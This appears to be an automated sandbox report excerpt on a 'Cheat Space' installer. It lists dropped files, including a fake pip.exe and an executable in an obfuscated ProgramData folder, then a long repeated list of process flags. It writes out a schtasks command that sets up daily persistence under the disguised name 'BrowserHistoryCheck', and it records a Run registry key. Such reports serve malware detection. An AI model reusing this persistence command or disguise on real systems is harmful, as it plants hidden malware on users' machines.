Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI969.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI19CD.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	File created: C:\Users\user\AppData\Roaming\Python\pip.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI75E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI82C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI3C83.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI304A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI3C62.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI84C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1B09.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1B98.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1A9A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI80C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI89B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1A6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI9C8.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	File created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI998.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1ABA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI31D1.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI19CD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1B09.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1B98.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1A9A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI304A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1A6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1ABA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI31D1.tmp	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:11 /f /tn BrowserHistoryCheck_NzI4 /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJIT			Jump to behavior
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJIT			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
